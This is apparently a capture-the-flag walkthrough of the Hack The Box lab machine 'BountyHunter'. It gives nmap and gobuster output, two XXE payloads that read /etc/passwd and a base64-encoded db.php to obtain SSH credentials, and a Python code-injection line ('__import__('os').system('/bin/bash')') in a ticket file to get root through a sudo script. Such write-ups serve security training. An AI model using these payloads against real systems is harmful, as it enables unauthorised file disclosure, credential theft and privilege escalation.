BountyHunter

Difficulty = Easy

---

First of all we run our nmap scan

# Nmap 7.94 scan initiated Thu Aug 10 12:10:16 2023 as: nmap -p- -sCV --min-rate=1000 -oN nmap.txt -v 10.10.11.100
Increasing send delay for 10.10.11.100 from 40 to 80 due to 87 out of 289 dropped probes since last increase.
Warning: 10.10.11.100 giving up on port because retransmission cap hit (10).
Increasing send delay for 10.10.11.100 from 640 to 1000 due to 79 out of 262 dropped probes since last increase.
Nmap scan report for 10.10.11.100
Host is up (0.23s latency).
Not shown: 45138 closed tcp ports (conn-refused), 20395 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 d4:4c:f5:79:9a:79:a3:b0:f1:66:25:52:c9:53:1f:e1 (RSA)
|   256 a2:1e:67:61:8d:2f:7a:37:a7:ba:3b:51:08:e8:89:a6 (ECDSA)
|_  256 a5:75:16:d9:69:58:50:4a:14:11:7a:42:c1:b6:23:44 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-favicon: Unknown favicon MD5: 556F31ACD686989B1AFCF382C05846AA
|_http-title: Bounty Hunters
|_http-server-header: Apache/2.4.41 (Ubuntu)
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Aug 10 12:16:07 2023 -- 1 IP address (1 host up) scanned in 351.09 seconds

• Navigating to port 80 - http, gives us a website

• viewing source doesn’t seems to have anything much except from a few clues to test out vulnerabilities on the website with a security tool called Burp Suite

• Also clicking portal on the web page :

• Takes us here :

• But after clicking Go here on the web page we get another web page, which looks like a Bounty Report System (Trust me, shit doesn’t work)

• Fired up Burp suite and after numerous test, i noticed that this page is vulnerable to XXE injection

payload :

<!--?xml version="1.0" ?-->
<!DOCTYPE foo [<!ENTITY example SYSTEM "/etc/passwd"> ]>
<data>&example;</data>

• Just to be sure we are doing the right thing, Directory Bruteforce:

sec-fortress@Pwn-F0rk-3X3C:~/HTB/BountyHunter$ gobuster dir -u http://10.10.11.100/ -w ~/SecLists-master/Discovery/Web-Content/big.txt -b 401,400,400,501,402,404,403 -x bak,zip,php,PHP,txt,html -t 40 2>/dev/null                         
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.11.100/
[+] Method:                  GET
[+] Threads:                 40
[+] Wordlist:                /home/sec-fortress/SecLists-master/Discovery/Web-Content/big.txt
[+] Negative Status codes:   404,403,401,400,501,402
[+] User Agent:              gobuster/3.5
[+] Extensions:              php,PHP,txt,html,bak,zip
[+] Timeout:                 10s
===============================================================
2023/08/10 12:29:18 Starting gobuster in directory enumeration mode
===============================================================
/assets               (Status: 301) [Size: 313] [--> http://10.10.11.100/assets/]
/css                  (Status: 301) [Size: 310] [--> http://10.10.11.100/css/]
/db.php               (Status: 200) [Size: 0]
/index.php            (Status: 200) [Size: 25169]
/js                   (Status: 301) [Size: 309] [--> http://10.10.11.100/js/]
/portal.php           (Status: 200) [Size: 125]
/resources            (Status: 301) [Size: 316] [--> http://10.10.11.100/resources/]

===============================================================
2023/08/10 12:52:54 Finished
===============================================================

• Yeah, definitely we can read files on the server, Now we need one more important file, maybe some file containing stored ssh creds
• After much Enumeration i decided to check each and every directory from our scan with gobuster, i found out db.php contains an empty page, why?? 🤔

• After much reading, there is a way to print out content of php files through XXE injection using a php wrapper (php://filter/convert.base64-encode/resource=file.php), you can read more on it from here
• Doing this to our target, gives us a base 64 encoded text

payload :

<!--?xml version="1.0" ?-->
<!DOCTYPE replace [<!ENTITY example SYSTEM "php://filter/convert.base64-encode/resource=db.php"> ]>
<data>&example;</data>

Looks like we got a password, let try it out on SSH with the user development

• It works :

Privilege Escalation

Since we have gotten shell as a normal user in the default home directory, let escalate privileges 😀

• First of all i ran sudo -l to confirm if there are executables/binaries we can run with sudo

• There is, looks like a ticket validator, let see what we can do with it

Just a python file that validates ticket 🤔, let us read source-code

• hmmmmmm, here is what i think :
  1. When it prompts us for a ticket file, we need to specify a file with a markdown format
  2. Once this is validated, it opens the file and check if the first line has > # Skytrain Inc
  3. Also checks if the second line has > ## Ticket to
  4. It then looks for a line with numbers that add up to each other greater than 100
• i decided to change to the /opt/skytrain_inc/invalid_tickets folder and saw sample code

• since we are not able to to write to this file, i created a sample and directed it to /tmp and named it segun.py, then gave it 777 permmissions

• i edited the file and changed it from this :

# Skytrain Inc
## Ticket to New Haven
__Ticket Code:__
**31+410+86**
##Issued: 2021/04/06
#End Ticket

To this:

# Skytrain Inc
## Ticket to New Haven
__Ticket Code:__
**18 + __import__('os').system('/bin/bash')**
##Issued: 2021/04/06
#End Ticket

• … and we got Root, Bankkaaaaiii 🎎